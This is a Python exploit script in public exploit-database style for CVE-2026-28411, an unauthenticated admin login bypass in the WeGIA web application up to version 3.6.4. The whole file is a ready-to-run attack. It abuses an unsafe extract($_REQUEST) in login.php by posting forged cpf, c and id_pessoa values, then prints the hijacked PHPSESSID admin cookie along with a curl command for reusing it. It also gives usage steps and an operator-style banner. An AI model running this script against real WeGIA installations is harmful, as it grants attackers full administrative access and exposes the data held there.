#!/usr/bin/env python3 # Exploit Title: WeGIA <= 3.6.4 Authentication Bypass to Admin Session # CVE: CVE-2026-28411 # Date: 2026-02-27 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: # Vendor Homepage: https://github.com/LabRedesCefetRJ/WeGIA # Software Link: https://github.com/LabRedesCefetRJ/WeGIA # Affected: WeGIA <= 3.6.4 # Tested on: WeGIA 3.6.4 # Category: Webapps # Platform: PHP # Exploit Type: Authentication Bypass # CVSS: 9.8 (Critical) # CWE: CWE-288, CWE-473 # Description: Unauthenticated admin login bypass via unsafe extract($_REQUEST) in login.php # Fixed in: 3.6.5 # Usage: # python3 exploit.py <target_url> [--admin-cpf ADMIN_CPF] [--admin-id ADMIN_ID] # # Examples: # python3 exploit.py http://192.168.1.100/WeGIA/html/login.php # python3 exploit.py https://target.com/wegia/html/login.php --admin-cpf admin --admin-id 1 # # Options: # --admin-cpf Known or guessed admin CPF/login (default: admin) # --admin-id Admin user ID to impersonate (default: 1) # # Notes: # - Exploits unsafe extract($_REQUEST) to overwrite login variables # - Sets admin session directly without password check # - After success, returned cookies can be used for full admin access # # How to Use # # Step 1: Run the script against the target login endpoint # Step 2: If successful → copy the PHPSESSID cookie # Step 3: Use cookie in browser or requests to access admin panel # print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-28411 • WeGIA Auth Bypass ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import argparse import requests import sys from urllib.parse import urljoin def exploit(target_url, admin_cpf="admin", admin_id="1"): session = requests.Session() login_url = urljoin(target_url.rstrip('/') + '/', "login.php") payload = { "cpf": admin_cpf, "c": "true", "id_pessoa": admin_id, } print(f"[*] Targeting: {login_url}") print(f"[*] Using payload: cpf={admin_cpf}, c=true, id_pessoa={admin_id}") try: response = session.post( login_url, data=payload, allow_redirects=False, timeout=10 ) print(f"[*] Status code: {response.status_code}") if response.status_code in (301, 302): location = response.headers.get("Location", "N/A") cookies = session.cookies.get_dict() print("[+] SUCCESS: Authentication bypass appears successful") print(f" Redirect: {location}") print(f" Cookies set: {cookies}") if "PHPSESSID" in cookies: print("\n[+] Admin session cookie obtained!") print(" PHPSESSID =", cookies["PHPSESSID"]) print("\nNext step: Use this cookie to access the admin panel:") print(f" Cookie: PHPSESSID={cookies['PHPSESSID']}") print(f" Example curl:") print(f" curl -b \"PHPSESSID={cookies['PHPSESSID']}\" {urljoin(target_url.rstrip('/') + '/', 'index.php')}") else: print("[-] Failed to bypass authentication") print(f" Response snippet:\n{response.text[:400]}...") except requests.RequestException as e: print(f"[!] Error: {e}") sys.exit(1) if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2026-28411 WeGIA Authentication Bypass Exploit") parser.add_argument("target", help="Target base URL (e.g. http://target.com/WeGIA/)") parser.add_argument("--admin-cpf", default="admin", help="Admin CPF/login to impersonate") parser.add_argument("--admin-id", default="1", help="Admin user ID to set") args = parser.parse_args() exploit(args.target, args.admin_cpf, args.admin_id)